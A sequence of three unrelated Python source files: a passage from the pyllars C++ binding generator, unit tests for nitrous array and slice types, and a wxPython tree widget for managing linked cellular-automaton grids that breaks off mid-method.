            '*': 'pyllars::OpBinaryEnum::MUL',
            '/': 'pyllars::OpBinaryEnum::DIV',
            '&': 'pyllars::OpBinaryEnum::AND',
            '|': 'pyllars::OpBinaryEnum::OR',
            '^': 'pyllars::OpBinaryEnum::XOR',
            '<<': 'pyllars::OpBinaryEnum::LSHIFT',
            '>>': 'pyllars::OpBinaryEnum::RSHIFT',
            '%': 'pyllars::OpBinaryEnum::MOD',
            '+=': 'pyllars::OpBinaryEnum::IADD',
            '-=': 'pyllars::OpBinaryEnum::ISUB',
            '*=': 'pyllars::OpBinaryEnum::IMUL',
            '/=': 'pyllars::OpBinaryEnum::IDIV',
            '&=': 'pyllars::OpBinaryEnum::IAND',
            '|=': 'pyllars::OpBinaryEnum::IOR',
            '^=': 'pyllars::OpBinaryEnum::IXOR',
            '<<=': 'pyllars::OpBinaryEnum::ILSHIFT',
            '>>=': 'pyllars::OpBinaryEnum::IRSHIFT',
            '%=': 'pyllars::OpBinaryEnum::IMOD',
            '[]': 'Map'
        }
        if 'default_delete' in self._node.qualifiers:
            return None, None
        operator_kind = self._node.name.replace("operator", '')
        params = [p for p in self._node.children if isinstance(p, NodeType.ParmVarDecl)]
        if len(params) > 1:
            raise Exception("Unexpected number of operator params")
        # Zero parameters means a unary operator, one means binary.
        cpp_op_name = unary_mapping.get(operator_kind) if len(params) == 0 else binary_mapping.get(operator_kind)
        if cpp_op_name is None:
            raise Exception(f"Unknown operator: {operator_kind}")
        class_name = self._node.parent.name
        class_full_cpp_name = self._node.parent.full_cpp_name
        try:
            parent = self._node.parent
            while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
                parent = parent.parent
            if not parent:
                return None, None
            parent_name = parent.name
            parent_header_path = os.path.join("..", parent_name)
            # generate body
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <{self.source_path}>\n""")
            if cpp_op_name == 'Map':
                body_stream.write("#include <pyllars/pyllars_classmapoperator.hpp>\n\n")
                body_stream.write(f"""template class pyllars::PyllarsClassMapOperator<{self._full_signature()},
 &{class_full_cpp_name}::{self._node.name}>;""")
            else:
                body_stream.write("#include <pyllars/pyllars_classoperator.hpp>\n\n")
                body_stream.write(f"""template class pyllars::PyllarsClassOperator<{self._full_signature()},
 &{class_full_cpp_name}::{self._node.name}, {cpp_op_name}>;""")
        finally:
            body_stream.close()
        return None, body_stream.name
def _parent_wrapper_name(node: NodeType.Node, recursed: Optional[NodeType.Node] = None):
    """
    Work out how *node* should be referenced from generated C++ code when
    its enclosing record may be anonymous.

    Walks upward through anonymous parents (tracking the originally
    requested node via ``recursed``) and returns a tuple of strings:
    (wrapper-class expression, parent C++ type name, attribute type
    expression, attribute's full C++ reference).

    NOTE(review): the disabled branch below returns a 3-tuple while every
    other path returns 4 values -- confirm before re-enabling it.
    """
    # Dead code, deliberately disabled via ``if False``.
    if False and not node.name:
        if node.parent is None:
            return None, None, None
        return _parent_wrapper_name(node.parent, recursed)
    parent = node.parent
    # When recursing, keep referring to the original node rather than the
    # intermediate anonymous parent.
    if recursed:
        node = recursed
    # Determine whether the parent record is immediately followed by a
    # field declaration (i.e. an anonymous type used as a named member).
    if parent.parent:
        index = parent.parent.children.index(parent)
        if index < 0:
            raise Exception("Invalid structure in hierarchy")
        is_named_attribute = len(parent.parent.children) - 1 > index and isinstance(parent.parent.children[index + 1], NodeType.FieldDecl)
    else:
        is_named_attribute = False
    if parent.name:
        if recursed:
            # Reached a named ancestor via anonymous intermediates: use the
            # anonymous wrapper around it.
            return f"__pyllars_internal::PythonAnonymousClassWrapper< ::{parent.full_cpp_name} >",\
                f"::{parent.full_cpp_name}", \
                f"decltype(::{parent.full_cpp_name}::{node.name})",\
                f"::{parent.full_cpp_name}::{node.name}"
        else:
            return f"__pyllars_internal::PythonClassWrapper< ::{parent.full_cpp_name} >", \
                f"::{parent.full_cpp_name}", \
                f"decltype(::{parent.full_cpp_name}::{node.name})",\
                f"::{parent.full_cpp_name}::{node.name}"
    elif is_named_attribute:
        # parent is anonymous type with a named field declaration, so this element is referenced to direct parent (field)
        parent_field_name = parent.parent.children[index + 1].name
        if parent_field_name:
            return f"__pyllars_internal::PythonClassWrapper<decltype(::{parent.parent.full_cpp_name}::{parent_field_name})>", \
                f"decltype(::{parent.parent.full_cpp_name}::{parent_field_name})", \
                f"decltype(::{parent.parent.full_cpp_name}::{parent_field_name}.{node.name})", \
                f"decltype(::{parent.parent.full_cpp_name}::{parent_field_name})::{node.name}"
        elif parent.parent.name:
            return f"__pyllars_internal::PythonClassWrapper<::{parent.parent.full_cpp_name}>", \
                f"::{parent.parent.full_cpp_name}", \
                f"decltype(::{parent.parent.full_cpp_name}::{node.name})", \
                f"::{parent.parent.full_cpp_name}::{node.name}"
        else:
            return _parent_wrapper_name(parent, node)
    elif recursed:
        return _parent_wrapper_name(parent, node)
    # Fall-through: anonymous parent, not a named attribute, first call.
    # NOTE(review): parent.parent is dereferenced unguarded here (unlike
    # above), and the following ``if is_named_attribute`` can only be False
    # at this point -- presumably legacy structure; confirm before pruning.
    index = parent.parent.children.index(parent)
    if index < 0:
        raise Exception("Invalid structure in hierarchy")
    if is_named_attribute:
        # parent is anonymous type with a named field declaration, so this element is referenced to direct parent (field)
        parent_field_name = parent.parent.children[index + 1].name
        if parent_field_name:
            return f"__pyllars_internal::PythonClassWrapper<decltype(::{parent.parent.full_cpp_name}::{parent_field_name})>", \
                f"{parent.parent.full_cpp_name}", \
                f"decltype(::{parent.parent.full_cpp_name}::{parent_field_name})",\
                f"::{parent.parent.full_cpp_name}::{parent_field_name}"
        elif parent.parent.name:
            return f"__pyllars_internal::PythonClassWrapper<decltype(::{parent.parent.full_cpp_name})>", \
                f"::{parent.parent.full_cpp_name}",\
                f"decltype(::{parent.parent.full_cpp_name}::{node.name})",\
                f"::{parent.parent.full_cpp_name}::{node.name}"
        else:
            return _parent_wrapper_name(parent, node)
    else:
        # parent is anonymous type without associated field, so element belongs to parent's parent when referenced in code
        if parent.parent.name:
            return f"__pyllars_internal::PythonAnonymousClassWrapper< ::{parent.parent.full_cpp_name} >", \
                f"::{parent.parent.full_cpp_name}", \
                f"decltype(::{parent.parent.full_cpp_name}::{node.name})", \
                f"::{parent.parent.full_cpp_name}::{node.name}"
        else:
            return _parent_wrapper_name(parent, node)
class FieldDeclGenerator(Generator):
    """Generates C++ glue code exposing (public) field declarations.

    For each field a small .cpp file is emitted that explicitly
    instantiates the pyllars template binding the field to its owning
    class wrapper.  Bit-fields take a dedicated path (see
    :meth:`generate_bitfield`) since they cannot be bound through a
    plain member pointer.
    """

    def _scoped_type_name(self, typ):
        """Expand each non-keyword token of *typ* to a fully scoped C++ name.

        Tokens are resolved by first walking up the node hierarchy for an
        enclosing definition with a matching name, then by scanning the
        parent's children for an internally defined type.  Unresolvable
        tokens are returned unchanged.
        """
        parts = typ.strip().split(' ')

        def full_name(token):
            if "::" in token:
                first, rest = token.split("::", maxsplit=1)
            else:
                first, rest = token, ""
            # Search upward for an enclosing definition matching the
            # leading scope component of the token.
            parent = self._node
            while parent:
                if hasattr(parent, 'name') and parent.name == first:
                    return "::" + ("::".join([parent.full_cpp_name, rest]) if rest else parent.full_cpp_name)
                parent = parent.parent
            # Possibly an internally defined class or type:
            for child in self._node.parent.children:
                if hasattr(child, 'name') and child.name == token:
                    return '::' + child.full_cpp_name
            return token

        for index, part in enumerate(parts):
            if part not in self.KEYWORDS:
                parts[index] = full_name(part)
        return ' '.join(parts)

    def generate(self):
        """Emit the .cpp body binding this field to its parent class.

        :return: (header_path, body_path) tuple; both None when nothing
            is generated (non-public members, IndirectFieldDecls,
            anonymous fields, or fields with no named ancestor).
        """
        # Only public members are exposed; struct members default to public.
        if 'public' not in self._node.qualifiers and \
                (self._node.parent is None or not hasattr(self._node.parent, 'qualifiers')
                 or 'struct' not in self._node.parent.qualifiers):
            return None, None
        if isinstance(self._node, NodeType.IndirectFieldDecl):
            return None, None
        if not self._node.name:
            return None, None
        # Anonymous parents cannot be referenced directly in C++; climb to
        # the nearest named ancestor.
        parent = self._node.parent
        while parent and not parent.name:
            parent = parent.parent
        if not parent:
            return None, None
        bitfield_specs = [c for c in self._node.children if isinstance(c, NodeType.IntegerLiteral)]
        if not isinstance(self, VarDeclGenerator) and bitfield_specs:
            # Bit-fields need getter/setter lambdas instead of a member pointer.
            return self.generate_bitfield(bitfield_specs)
        # BUG FIX: the node-id fallback was plain string concatenation with a
        # (possibly non-str) node_id; use an f-string like the parent fallback.
        body_path = os.path.join(
            self.my_root_dir, self._source_path_root,
            (parent.name or f"anon_{parent.node_id}") + '::' + (self._node.name or f"anon_{self._node.node_id}") + '.cpp')
        with open(body_path, 'w', encoding='utf-8') as body_stream:
            parent_name = parent.name
            parent_header_path = os.path.join("..", parent_name)
            # generate body
            member_qualifier = "Static" if 'static' in self._node.qualifiers else ""
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <pyllars/pyllars_class{member_qualifier.lower()}member.hpp>
""")
            if not self._node.name:
                return None, None
            wrapper, parent_type_name, attribute_type_name, attribute_full_cpp_name = _parent_wrapper_name(self._node)
            body_stream.write("using namespace pyllars;\n\nnamespace{\n")
            body_stream.write(f" constexpr cstring name = \"{self._node.name}\";\n")
            body_stream.write("}\n\n")
            body_stream.write(f"template class pyllars::PyllarsClass{member_qualifier}Member<name, {parent.full_cpp_name}, {attribute_type_name}, &{attribute_full_cpp_name}>;")
        return None, body_stream.name

    def generate_bitfield(self, specs: List["NodeType.IntegerLiteral"]):
        """Emit the .cpp body binding a bit-field through getter/setter lambdas.

        :param specs: IntegerLiteral children holding the bit width;
            exactly one is expected.
        :raises Exception: if more than one width specifier is present.
        """
        if len(specs) > 1:
            raise Exception("multiple size specs provided for bit field")
        size = specs[0].value
        is_const = 'const' in self._node.type_text.split()
        name = self._node.name or f"anon_{self._node.node_id}"
        wrapper, parent_type_name, attribute_type_name, attribute_full_cpp_name = _parent_wrapper_name(self._node)
        # BUG FIX: the second fallback was a plain string missing the f prefix,
        # producing a literal "anon_{self._node.node_id}" file name.
        body_path = os.path.join(
            self.my_root_dir, self._source_path_root,
            (self._node.parent.name or f"anon_{self._node.parent.node_id}") + '::' +
            (self._node.name or f"anon_{self._node.node_id}") + '.cpp')
        with open(body_path, 'w', encoding='utf-8') as body_stream:
            # Climb past anonymous record ancestors to a nameable parent.
            parent = self._node.parent
            while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
                parent = parent.parent
            if not parent:
                return None, None
            parent_name = parent.name
            parent_header_path = os.path.join("..", parent_name)
            # generate body
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <{self.source_path}>
#include <pyllars/pyllars_classbitfield.hpp>
""")
            name = self._node.name
            if not name:
                return None, None
            typename = self._scoped_type_name(self._node.type_text)
            const_typename = 'const ' + typename if 'const' not in typename.split() else typename
            # const bit-fields get no setter (nullptr below).
            setter = "" if is_const else f"static std::function<{typename}({parent_type_name}&, {const_typename}&)> setter = []({parent_type_name} & obj, {const_typename}& value)->{typename}{{obj.{name} = value; return value;}};"
            body_stream.write(f"""
namespace{{
extern const char name[] = "{name}";
static std::function<{typename}(const {parent_type_name}&)> getter = [](const {parent_type_name} & obj)->{typename}{{return obj.{name};}};
constexpr std::function<{typename}(const {parent_type_name}&)>* getter_p = &getter;
""")
            if setter:
                body_stream.write(f"""
{setter}
constexpr std::function<{typename}({parent_type_name}&, {const_typename}&)>* setter_p = &setter;
""")
            body_stream.write("}\n\n")
            body_stream.write(f"""template class pyllars::PyllarsClassBitField<name, {parent_type_name}, {typename}, {size}, getter_p, {"setter_p" if setter else "nullptr"}>;""")
        return None, body_stream.name
class VarDeclGenerator(FieldDeclGenerator):
    """Generator for variable declarations.

    Reuses FieldDeclGenerator wholesale; generate() explicitly skips the
    bit-field path for VarDeclGenerator instances.
    """
    pass
class IndirectFieldDeclGenerator(FieldDeclGenerator):
    """Generator for indirect field declarations.

    Inherits FieldDeclGenerator; note that generate() returns
    (None, None) for NodeType.IndirectFieldDecl nodes, so this class
    effectively emits nothing.
    """
    pass
| |
import unittest
import ctypes
from nitrous.module import module
from nitrous.function import function
from nitrous.types import Long
from nitrous.types.array import Array, FastSlice, Slice, Any
try:
import numpy as np
except ImportError:
np = None
class ArrayTestsBase(object):
    """Shared tests for the Array/Slice/FastSlice container types.

    Subclasses supply the ``A`` (3-D input) and ``B`` (flat output) type
    attributes; setUp compiles a function that flattens a 2x3x2 array of
    longs into a 12-element buffer and returns the element count.
    """

    def setUp(self):
        X, Y, Z = range(3)

        @function(Long, a=self.A, b=self.B)
        def f(a, b):
            m = 0
            for i in range(a.shape[X]):
                for j in range(a.shape[Y]):
                    for k in range(a.shape[Z]):
                        b[m] = a[i, j, k]
                        m += 1
            return m

        self.m = module([f])
        self.addCleanup(delattr, self, "m")

    def test_array(self):
        """Flatten a nested ctypes 2x3x2 array of longs."""
        A = (((ctypes.c_long * 2) * 3) * 2)
        a = A(((1, 2), (3, 4), (5, 6)),
              ((7, 8), (9, 10), (11, 12)))
        B = ctypes.c_long * 12
        b = B()
        m = self.m.f(a, b)
        self.assertEqual(m, 12)
        # FIX: wrap range() in list() so the comparison also holds on
        # Python 3, where a list never equals a range object.
        self.assertEqual(list(b), list(range(1, 13)))

    @unittest.skipIf(not np, "NumPy integration feature")
    def test_ndarray(self):
        """Flatten a NumPy 2x3x2 array with a native-long dtype."""
        dtype = np.dtype("i{0}".format(ctypes.sizeof(ctypes.c_long)))
        a = np.array([
            ((1, 2), (3, 4), (5, 6)),
            ((7, 8), (9, 10), (11, 12))
        ], dtype=dtype)
        b = np.empty(12, dtype=dtype)
        m = self.m.f(a, b)
        self.assertEqual(m, 12)
        # Same Python 3 compatibility fix as test_array.
        self.assertEqual(list(b), list(range(1, 13)))
class SliceTests(ArrayTestsBase, unittest.TestCase):
    """Array behaviour plus repr/str formatting of fully dynamic slices."""

    A = Slice(Long, (Any,) * 3)
    B = Slice(Long)

    def test_repr(self):
        for obj, expected in [
            (self.A, "Slice(Long, shape=(Any, Any, Any))"),
            (self.B, "Slice(Long, shape=(Any,))"),
        ]:
            self.assertEqual(repr(obj), expected)

    def test_str(self):
        for obj, expected in [
            (self.A, "<Slice [? x [? x [? x Long]]]>"),
            (self.B, "<Slice [? x Long]>"),
        ]:
            self.assertEqual(str(obj), expected)
class FastSliceTests(ArrayTestsBase, unittest.TestCase):
    """Array behaviour plus repr/str formatting of fully static fast slices."""

    A = FastSlice(Long, (2, 3, 2))
    B = FastSlice(Long, (12,))

    def test_repr(self):
        for obj, expected in [
            (self.A, "FastSlice(Long, shape=(2, 3, 2))"),
            (self.B, "FastSlice(Long, shape=(12,))"),
        ]:
            self.assertEqual(repr(obj), expected)

    def test_str(self):
        for obj, expected in [
            (self.A, "<FastSlice [2 x [3 x [2 x Long]]]>"),
            (self.B, "<FastSlice [12 x Long]>"),
        ]:
            self.assertEqual(str(obj), expected)
class ArrayTests(ArrayTestsBase, unittest.TestCase):
    """Array behaviour plus repr/str formatting of fixed-shape arrays."""

    A = Array(Long, (2, 3, 2))
    B = Array(Long, (12,))

    def test_repr(self):
        for obj, expected in [
            (self.A, "Array(Long, shape=(2, 3, 2))"),
            (self.B, "Array(Long, shape=(12,))"),
        ]:
            self.assertEqual(repr(obj), expected)

    def test_str(self):
        for obj, expected in [
            (self.A, "<Array [2 x [3 x [2 x Long]]]>"),
            (self.B, "<Array [12 x Long]>"),
        ]:
            self.assertEqual(str(obj), expected)
class ArrayAllocTests(unittest.TestCase):
    """Allocation and initialization of arrays inside compiled functions."""

    def test_alloc_return(self):
        """Allocate array and pass back through return value."""
        from nitrous.types import Double
        Coord = Array(Double, (3,))

        @function(Coord, x=Double, y=Double, z=Double)
        def make_coord(x, y, z):
            return Coord((x, y, z))

        # Wrapper exercises passing the array back through a nested call.
        @function(Coord, x=Double, y=Double, z=Double)
        def make_coord_2(x, y, z):
            return make_coord(x, y, z)

        m = module([make_coord, make_coord_2])
        c = m.make_coord_2(1.0, 2.0, 3.0)
        self.assertEqual(tuple(c), (1.0, 2.0, 3.0))

    def test_init_2d(self):
        """Multi-dimensional array initialization."""
        from nitrous.types import Double
        Double2x2 = Array(Double, (2, 2))

        @function(Double2x2, x=Double, y=Double, z=Double, w=Double)
        def make_2x2(x, y, z, w):
            return Double2x2(((x, y), (z, w)))

        m = module([make_2x2])
        c = m.make_2x2(1.0, 2.0, 3.0, 4.0)
        # Row-major layout: first row (x, y), second row (z, w).
        self.assertEqual(c[0][0], 1.0)
        self.assertEqual(c[0][1], 2.0)
        self.assertEqual(c[1][0], 3.0)
        self.assertEqual(c[1][1], 4.0)
class SliceReferenceTests(unittest.TestCase):
    """Slices must behave as reference (aggregate) types."""

    def test_reference_arg(self):
        """Slice is treated as reference type."""
        from nitrous.types import is_aggregate
        slice_type = Slice(Long)
        self.assertTrue(is_aggregate(slice_type))
class IndexTests(unittest.TestCase):
    """Flat-index computation for slices with static vs. dynamic dimensions."""

    def setUp(self):
        # 3x3x3 cube of longs; the second and third planes are deliberately
        # out of numeric order so a wrong offset yields a wrong element.
        self.data = (((Long.c_type * 3) * 3) * 3)(
            ((0, 1, 2), (3, 4, 5), (6, 7, 8)),
            ((18, 19, 20), (21, 22, 23), (24, 25, 26)),
            ((9, 10, 11), (12, 13, 14), (15, 16, 17)),
        )
        self.addCleanup(delattr, self, "data")

    def test_static_dimension(self):
        """Replace access to known dimensions with direct constants"""
        from nitrous.module import dump
        D = Slice(Long, shape=(Any, 3, 3))
        X, Y, Z = range(3)

        @function(Long, a=D)
        def f(a):
            return a[2, 1, 2]

        m = module([f])
        # All indices should be resolved at compile time, so there should be
        # no run-time multiplications in the generated code.
        # NOTE(review): assertNotRegexpMatches is the Python 2-era alias of
        # assertNotRegex (the alias was removed in Python 3.12).
        self.assertNotRegexpMatches(dump(m), "mul")
        self.assertEqual(m.f(self.data), 14)

    def test_all_dynamic_dimension(self):
        """All dimensions are dynamic, no indices can be resolved at compile time"""
        from nitrous.module import dump
        D = Slice(Long, shape=(Any, Any, Any))
        X, Y, Z = range(3)

        @function(Long, a=D)
        def f(a):
            return a[2, 1, 2]

        m = module([f])
        # Should have run-time multiplications during index flattening.
        self.assertRegexpMatches(dump(m), "mul")
        self.assertEqual(m.f(self.data), 14)

    def test_mixed_dynamic_dimension(self):
        """Some dimensions are dynamic, other than major one"""
        from nitrous.module import dump
        D = Slice(Long, shape=(Any, 3, Any))
        X, Y, Z = range(3)

        @function(Long, a=D)
        def f(a):
            return a[2, 1, 2]

        m = module([f])
        # Should have run-time multiplications during index flattening.
        self.assertRegexpMatches(dump(m), "mul")
        self.assertEqual(m.f(self.data), 14)
class SubsliceTests(unittest.TestCase):
    """Indexing a slice with fewer indices than dimensions yields a sub-slice."""

    def setUp(self):
        self.DataSlice = Slice(Long, (5, 2, 3))
        # 5x2x3 block of longs with values shuffled across planes so that a
        # wrong offset computation produces a visible mismatch.
        self.data = (((Long.c_type * 3) * 2) * 5)(
            ((0, 1, 2), (3, 4, 5)),
            ((6, 7, 8), (18, 19, 20)),
            ((21, 22, 23), (24, 25, 26)),
            ((9, 10, 11), (12, 13, 14)),
            ((15, 16, 17), (33, 34, 35)),
        )
        self.addCleanup(delattr, self, "DataSlice")
        self.addCleanup(delattr, self, "data")

    def test_subslice_shape_i(self):
        """Subslice shape reduced by one dimension (two remain)"""
        ND, S0, S1 = range(3)

        @function(x=self.DataSlice, i=Long, v=Slice(Long))
        def get_i(x, i, v):
            # Report the sub-slice's ndim and shape via the output buffer.
            s = x[i]
            v[ND] = s.ndim
            v[S0] = s.shape[0]
            v[S1] = s.shape[1]

        m = module([get_i])
        v = (Long.c_type * 3)()
        # Shape and dimensions should not depend on indices.
        for i in range(5):
            m.get_i(self.data, i, v)
            self.assertEqual(v[ND], 2)
            self.assertEqual(v[S0], 2)
            self.assertEqual(v[S1], 3)

    def test_subslice_shape_ij(self):
        """Subslice shape reduced by two dimensions (one remains)"""
        ND, S0 = range(2)

        @function(x=self.DataSlice, i=Long, j=Long, v=Slice(Long))
        def get_ij(x, i, j, v):
            s = x[i, j]
            v[ND] = s.ndim
            v[S0] = s.shape[0]

        m = module([get_ij])
        v = (Long.c_type * 2)()
        # Shape and dimensions should not depend on indices.
        for i in range(5):
            for j in range(2):
                m.get_ij(self.data, i, j, v)
                self.assertEqual(v[ND], 1)
                self.assertEqual(v[S0], 3)

    def test_subslice_data_i(self):
        """Subslice data reduced by one dimension (two remain)"""
        @function(x=self.DataSlice, i=Long, v=Slice(Long, (2, 3)))
        def get_i(x, i, v):
            # Copy the 2x3 sub-slice into the output slice element-wise.
            s = x[i]
            for j in range(2):
                for k in range(3):
                    v[j, k] = s[j, k]

        m = module([get_i])
        v = ((Long.c_type * 3) * 2)()
        for i in range(5):
            m.get_i(self.data, i, v)
            ref_v = list(list(row) for row in self.data[i])
            self.assertEqual(list(list(row) for row in v), ref_v)

    def test_subslice_data_ij(self):
        """Subslice data reduced by two dimensions (one remains)"""
        @function(x=self.DataSlice, i=Long, j=Long, v=Slice(Long, (3,)))
        def get_ij(x, i, j, v):
            s = x[i, j]
            for k in range(3):
                v[k] = s[k]

        m = module([get_ij])
        v = (Long.c_type * 3)()
        for i in range(5):
            for j in range(2):
                m.get_ij(self.data, i, j, v)
                self.assertEqual(list(v), list(self.data[i][j]))
| |
import wx
from .utils import debug, Singleton, Point
from .ca_link import LINK_TYPE_IDS, LINK_TYPE_NAMES
from six import add_metaclass
from random import randint
def get_random_color():
    """Return a random RGB color as an (r, g, b) tuple of ints in 0..255."""
    return tuple(randint(0, 255) for _ in range(3))
class ChangeSpeedDialog(wx.Dialog):
    """Dialog frame to change grids' speed

    Shows a text field mirrored by a spin button (range 1-100); pressing
    "Set" forwards the value to the parent's SetSpeed() and closes.
    """

    def __init__(self, parent, id_=None):
        """:param parent: widget exposing SetSpeed(speed, id_)
        :param id_: target grid id; None means the current ("THIS") grid
        """
        super(ChangeSpeedDialog, self).__init__(parent, wx.ID_ANY, "Speed")
        self.__parent = parent
        self.__id = id_
        self.text = wx.TextCtrl(self, value="1")
        self.spin = wx.SpinButton(self, style=wx.SP_VERTICAL)
        self.spin.SetRange(1, 100)
        self.spin.SetValue(1)
        self.btn = wx.Button(self, label='Set')
        # Text + spin side by side, "Set" button underneath.
        sizerh = wx.BoxSizer(wx.HORIZONTAL)
        sizerv = wx.BoxSizer(wx.VERTICAL)
        sizerh.Add(self.text, 0, wx.CENTER)
        sizerh.Add(self.spin, 0, wx.CENTER)
        sizerv.Add(sizerh, 0, wx.CENTER)
        sizerv.Add(self.btn, 1, wx.CENTER)
        self.SetSizer(sizerv)
        self.SetAutoLayout(True)
        sizerv.Fit(self)
        self.Bind(wx.EVT_BUTTON, self.OnSet, self.btn)
        self.Bind(wx.EVT_SPIN, self.OnSpin, self.spin)
        self.Show()

    def OnSpin(self, event):
        """Spin event
        """
        # Mirror the spin position into the text control.
        self.text.SetValue(str(event.GetPosition()))

    def OnSet(self, event):
        """Set event
        """
        # NOTE(review): int() raises ValueError if the user typed a
        # non-integer -- confirm intended handling.
        self.__parent.SetSpeed(int(self.text.GetValue()), self.__id)
        self.Close()
class MyTreeCtrl(wx.TreeCtrl):
    """Widget to manage imported grids

    Tree items carry encoded labels of the form
    "<name> | id:<id> - with speed = <speed>" with "IN to -> (x,y)" /
    "OUT from -> (x,y)" link children; event handlers parse these labels
    back to recover ids, positions and link types.
    """

    def __init__(self, parent, id_, pos, size, style):
        super(MyTreeCtrl, self).__init__(parent, id_, pos, size, style)
        self.item = None
        self.__notman = None  # notebook manager, injected via set_notebook()
        self.__root = self.AddRoot("Grids")
        self.AppendItem(self.__root, "--- THIS GRID ---")
        self.__mem_color = dict()  # remembered background color per grid id
        self.__selection = [get_random_color()]
        self.Bind(wx.EVT_LEFT_DOWN, self.OnDown)
        self.Bind(wx.EVT_RIGHT_DOWN, self.OnDown)
        self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
        self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelChanged)

    def del_selection(self):
        # Clear any link highlighting in the notebook.
        self.__notman.SetLinkSelection([])

    def init_selection(self):
        # Push the currently remembered selection to the notebook.
        self.__notman.SetLinkSelection(self.__selection)

    def set_notebook(self, notebook):
        """Sets notebook's reference
        """
        self.__notman = notebook
        self.DeleteChildren(self.__root)
        first = self.AppendItem(
            self.__root, "--- THIS GRID --- with speed = %s" % self.__notman.GetSpeed())
        self.SetItemBackgroundColour(first, get_random_color())

    def OnSelChanged(self, e):
        """Change selection event

        Rebuilds self.__selection from the selected item's label:
        (color, id, pos, type) for a link row, (color, id) for a grid
        row, or [color] otherwise; then forwards it to the notebook.
        """
        if self.GetSelection().IsOk():
            text = self.GetItemText(self.GetSelection())
            if text.find("->") != -1:
                # Link row: the grid name/id live in the parent item's label.
                type_ = id_ = pos = name = None
                parent_text = self.GetItemText(
                    self.GetItemParent(self.GetSelection()))
                name, id_ = parent_text.split(
                    " - with speed =")[0].split(" | id:")
                id_ = int(id_)
                if text.find("from") != -1:
                    type_, pos = text.split(" from -> ")
                    type_ = LINK_TYPE_NAMES[type_]
                    # NOTE(review): map() is subscripted below, which only
                    # works on Python 2 where map returns a list -- confirm
                    # the supported Python version.
                    pos = map(
                        int, pos.replace("(", "").replace(")", "").split(","))
                    pos = Point(pos[0], pos[1])
                elif text.find("to") != -1:
                    type_, pos = text.split(" to -> ")
                    type_ = LINK_TYPE_NAMES[type_]
                    pos = map(
                        int, pos.replace("(", "").replace(")", "").split(","))
                    pos = Point(pos[0], pos[1])
                color = self.GetItemBackgroundColour(
                    self.GetItemParent(self.GetSelection()))
                self.__selection = (color, id_, pos, type_)
            elif text.find("|") != -1:
                # Grid row: "<name> | id:<id> - with speed = <speed>".
                name, id_ = text.split(" - with speed =")[0].split(" | id:")
                id_ = int(id_)
                color = self.GetItemBackgroundColour(self.GetSelection())
                self.__selection = (color, id_)
            else:
                color = self.GetItemBackgroundColour(self.GetSelection())
                self.__selection = [color]
            try:
                self.__notman.SetLinkSelection(self.__selection)
            except wx.PyDeadObjectError:
                # NOTE(review): wx.PyDeadObjectError exists only in wxPython
                # Classic (gone in wxPython 4/Phoenix) -- confirm wx version.
                pass

    def UpdateTree(self):
        """Update the grids' tree
        """
        self.DeleteChildren(self.__root)
        first = self.AppendItem(
            self.__root, "--- THIS GRID --- with speed = %s" % self.__notman.GetSpeed())
        # Reuse remembered colors so items keep their color across rebuilds.
        if "first" not in self.__mem_color:
            self.__mem_color['first'] = get_random_color()
        self.SetItemBackgroundColour(first, self.__mem_color['first'])
        if self.__notman:
            for id_, links, name, speed in self.__notman.get_linked_grids():
                if id_ not in self.__mem_color:
                    self.__mem_color[id_] = get_random_color()
                child = self.AppendItem(
                    self.__root, "%s | id:%s - with speed = %s" % (name, id_, speed))
                self.SetItemBackgroundColour(child, self.__mem_color[id_])
                for pos, type_ in links:
                    if type_ == LINK_TYPE_NAMES["IN"]:
                        self.AppendItem(child, "IN to -> (%s,%s)" % pos)
                    elif type_ == LINK_TYPE_NAMES["OUT"]:
                        self.AppendItem(child, "OUT from -> (%s,%s)" % pos)
        self.ExpandAll()

    def UpdateGrids(self, e):
        """Update all imported grids
        """
        self.__notman.update_grids()

    def DeleteGrid(self, e):
        """Delete a grid
        """
        debug("DeleteGrid")
        text = self.GetItemText(self.GetSelection())
        if text == "Grids":
            return
        if text.find("|") == -1:
            # A link row is selected; the grid label is on its parent item.
            text = self.GetItemText(self.GetItemParent(self.GetSelection()))
        name, id_ = text.split(" - with speed =")[0].split(" | id:")
        self.__notman.delete_grid(int(id_))
        self.UpdateTree()

    def InsertGrid(self, e):
        """Insert a grid
        """
        files_types = "Grid Files (*.cg)|*.cg|File di Testo (*.txt)|*.txt|Tutti i Files (*)|*"
        dialog = wx.FileDialog(
            self, message="Open grid file", wildcard=files_types, style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
        )
        if dialog.ShowModal() == wx.ID_OK:
            path = dialog.GetPath()
            self.__notman.insert_grid(path)
            self.UpdateTree()
        dialog.Destroy()

    def ChangeRandomColor(self, e):
        """Change a color of a selected item randomly
        """
        # DEBUG
        # debug("ChangeRandomColor")
        if self.GetItemText(self.GetSelection()).find("THIS") != -1:
            self.__mem_color['first'] = get_random_color()
            self.SetItemBackgroundColour(
                self.GetSelection(), self.__mem_color['first'])
        else:
            text = self.GetItemText(self.GetSelection())
            name, id_ = text.split(" - with speed =")[0].split(" | id:")
            self.__mem_color[int(id_)] = get_random_color()
            self.SetItemBackgroundColour(
                self.GetSelection(), self.__mem_color[int(id_)])
        self.ToggleItemSelection(self.GetSelection())

    def OnDown(self, event):
        """On down tree event
        """
        pt = event.GetPosition()
        item, flags = self.HitTest(pt)
        if item:
            self.SelectItem(item)
        else:
            # Click on empty space: keep the notebook highlight and clear
            # the tree selection.
            self.__notman.SetLinkSelection(self.__selection)
            self.UnselectAll()

    def SetSpeed(self, speed, id_):
        """Set the speed of a grid
        """
        if id_ is None:
            # None targets the current ("THIS") grid.
            self.__notman.SetSpeed(speed)
        else:
            self.__notman.SetGridsSpeed(speed, id_)
        self.UpdateTree()

    def ChangeSpeed(self, event):
        """Calling the dialog to change the speed of a grid
        """
        # A selection longer than one element carries a grid id at [1].
        if len(self.__selection) > 1:
            ChangeSpeedDialog(self, self.__selection[1])
        else:
            ChangeSpeedDialog(self)

    def OnRightUp(self, event):
        """On right up tree event
        """
        # Context menu: entries depend on what is currently selected.
        menu = wx.Menu()
        insert_grid = menu.Append(wx.ID_ANY, "Insert grid")
